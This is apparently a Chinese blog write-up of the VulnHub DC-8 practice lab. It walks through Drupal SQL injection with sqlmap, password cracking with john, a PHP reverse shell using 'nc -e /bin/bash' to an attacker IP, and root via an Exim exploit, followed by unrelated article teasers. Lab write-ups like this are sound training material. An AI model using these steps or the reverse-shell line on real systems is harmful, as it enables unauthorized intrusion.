Vulnhub靶机DC系列
0x0:靶场介绍
靶场名称: DC: 8
靶场发布时间:2019-9-8
靶场地址:https://www.vulnhub.com/entry/dc-8,367/
靶场描述:
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing it's job.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
1x0:环境搭建
VMware虚拟机(桥接模式)
2x0:靶机渗透
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务 还是Drupal
提示不用爆破破解,使用dirb扫描一下目录
存在robots.txt文件
登录地址:
版本大致的判断:
这三个页面url中存在参数sqlmap去尝试一下
sqlmap确定存在sql注入
读取一下数据
drupal的密码是特殊加密的需要爆破破解,使用john
john pwd --wordlist=/usr/share/wordlists/rockyou.txt
john/turtle 登录页面
3x0:后台篇
登录后需要获取到shell
在页面中发现可以直接执行php语句
写入shell
<?php
system("nc -e /bin/bash 192.168.3.20 1234");
?>反弹到kali中 随便提交数据
反弹成功
4x0:提权篇
切换shell
查看一下用户有那些
在看看有没有内核提权
find / -perm -u=s -type f 2>/dev/null 查看具有root权限的命令
查看一下exim4的版本 又没有漏洞
exim4 --version
https://www.exploit-db.com/exploits/46996找到一个可以使用的exp
下载exp,上传到靶机中并赋予权限
使用过程中报错了
需要对exp脚本 执行编码
vim 46996.sh
:set ff=unix
:wq
在重新上传到靶机中 提权(改完还是报错),直接复制代码在靶机中创建文件填写
执行成功。
获取到root权限
5x0:flag获取
相关文章
乙醇汽油价格如何(乙醇汽油和普通汽油区别)
2017年9月13日,由国家发展改革委、国家能源局、财政部等十五部委联合印发《关于扩大生物燃料乙醇生产和推广使用车用乙醇汽油的实施方案》,根据方案要求,到2020年,全国范围内将基本实现车用乙醇汽...
小说黑客组织名字(小说黑客组织名字大全)
本文目录一览: 1、求一本主角是黑客的小说 想不起来叫什么了 2、找一本都市小说的名字,剧情开始是男主角是一个黑客,名字叫隐。别的国家黑客入侵中国,他为了国家奋斗, 3、本人要写一小说,求代号...
叨教已删除的微信聊天记录可以找回吗 把微信卸载重新安装,之前的聊
有这样一种视频,它极其诱人,你无法抗拒它的诱惑,点击。在一阵守候之后,你会觉察到适才看到的只是“梦幻泡影”,此时,你已身处深不见底的“瓮”中。 RealPlayer是人人常用的媒体播放器,用户异常...
酒店住房记录可以查吗
曾宝仪结婚了吗 她老公是谁起底其个人资料 曾宝仪是娱乐圈知名的艺人,虽然已经退隐几年的时间了,但是因为父亲曾志伟的关系,大家依旧记得曾宝仪的名字。曾宝仪的感情,也一直是备受关注的,大家都很关心曾宝仪的...
lol游戏中怎么回复私聊?
LOL怎么在游戏里回复好友?LOL回复好友私聊的快捷键是什么?小编今天来教大家怎么在游戏中回复好友,有时候我们在游戏中好友问我们一些事情,我们没有及时回复或者不会回复可能会让好友误会,今天小编就来教教...
3m怎么赚钱?3M如何成为千亿美金帝国?
武汉肺炎疫情把“口罩”送上了热搜,让其成为了2020最紧俏的“年货”。而一说到口罩,你第一个想到的品牌一定是3M。 1月28日晚间,3M(NYSE:MMM)公布了其2019年四季度及全年业绩报告。核...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!